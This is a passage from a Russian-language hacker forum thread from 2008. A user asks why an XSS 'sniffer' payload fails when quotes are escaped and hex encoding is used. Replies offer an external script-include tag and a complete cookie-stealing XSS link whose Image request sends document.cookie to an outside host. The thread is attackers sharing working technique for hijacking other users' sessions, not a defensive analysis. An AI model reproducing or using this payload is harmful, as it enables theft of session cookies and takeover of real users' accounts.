Может кто-нибудь все-таки подскажет: Когда я пытаюсь внедрить свой код в активный xss(работает скрипт) " и ' фильтруются. Когда ввожу скрипт со сниффом в 16 системе, то скрипт не выполняется. Что не так?
вообщем, xss выполняется, но " и ' фильтруются, то есть перед ними ставится /. Но перевожу скрипт в форму hex, то скрипт не выполняется, тоесть он просто выводит его на странице. Может это из-за браузера? Без примера, тк не хочу расппространятся.
вообщем, xss выполняется, но " и ' фильтруются, то есть перед ними ставится /. Но перевожу скрипт в форму hex, то скрипт не выполняется, тоесть он просто выводит его на странице. Может это из-за браузера? Без примера, тк не хочу расппространятся.
Код:
<script src=script.js></script>
__________________ Карфаген должен быть разрушен...
вообщем, xss выполняется, но " и ' фильтруются, то есть перед ними ставится /. Но перевожу скрипт в форму hex, то скрипт не выполняется, тоесть он просто выводит его на странице. Может это из-за браузера? Без примера, тк не хочу расппространятся.
-slow-,
Сначала найди xss'ку на нужном тебе сайте
А потом ссылка вида:
www.site.ru/index.php?id=<script>img=new Image();img.src="http://www.s.netsec.ru/pic.gif?"+document.cookie;</script>
Последний раз редактировалось 0nep@t0p; 09.02.2008 в 11:15..